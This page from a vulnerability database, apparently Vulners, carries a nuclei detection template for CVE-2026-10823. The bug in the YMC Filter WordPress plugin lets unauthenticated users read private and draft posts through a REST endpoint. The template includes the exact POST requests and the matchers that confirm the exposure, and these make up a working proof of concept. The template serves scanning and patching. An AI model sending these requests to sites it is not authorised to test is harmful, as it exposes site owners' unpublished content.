Lucene search
K

YMC Filter WordPress - Unauthenticated Post Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Unauthenticated REST API leaks private and draft posts in YMC Filter WordPress plugin before 3.11.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-10823
26 Jun 202606:00
attackerkb
Circl
CVE-2026-10823
29 Jun 202612:00
circl
CVE
CVE-2026-10823
26 Jun 202606:00
cve
Cvelist
CVE-2026-10823 YMC Smart Filter < 3.11.3 - Unauthenticated Private/Draft Post Disclosure
26 Jun 202606:00
cvelist
EUVD
EUVD-2026-39624
26 Jun 202606:00
euvd
NVD
CVE-2026-10823
26 Jun 202607:16
nvd
Positive Technologies
PT-2026-52664
26 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-10823 YMC Smart Filter < 3.11.3 - Unauthenticated Private/Draft Post Disclosure
26 Jun 202606:00
vulnrichment
id: CVE-2026-10823

info:
  name: YMC Filter WordPress - Unauthenticated Post Disclosure
  author: Hardik-369
  severity: high
  description: |
    YMC Filter WordPress plugin < 3.11.3 contains a broken access control vulnerability caused by improper authorization and lack of validation in a REST API endpoint, letting unauthenticated attackers retrieve private and non-public post content, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access private, draft, and non-public post content, leading to sensitive information disclosure.
  remediation: |
    Update to version 3.11.3 or later.
  reference:
    - https://wpscan.com/vulnerability/b55ebf9e-a05d-4ae4-b653-da7db63e76d2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10823
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-10823
    epss-score: 0.00921
    epss-percentile: 0.5595
    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: true
    vendor: ymc
    product: ymc-filter
    publicwww-query: "/plugins/ymc-smart-filter/"
  tags: cve,cve2026,wordpress,wp-plugin,ymc-filter,disclosure,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":1,"post_status":"publish"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"success\":true")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":1,"post_status":"draft"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"success\":true", "post-card")'
        condition: and
# digest: 4a0a00473045022100c891b72d095100e163ccb80623b4be474f5411329d0756d66f09e20c3d85ec3f02202e1a12afbf61333a0698b421c428cb049f0ad04d3ef79e19a87f5ec0940298c9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2026 21:27Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.00921
SSVC
6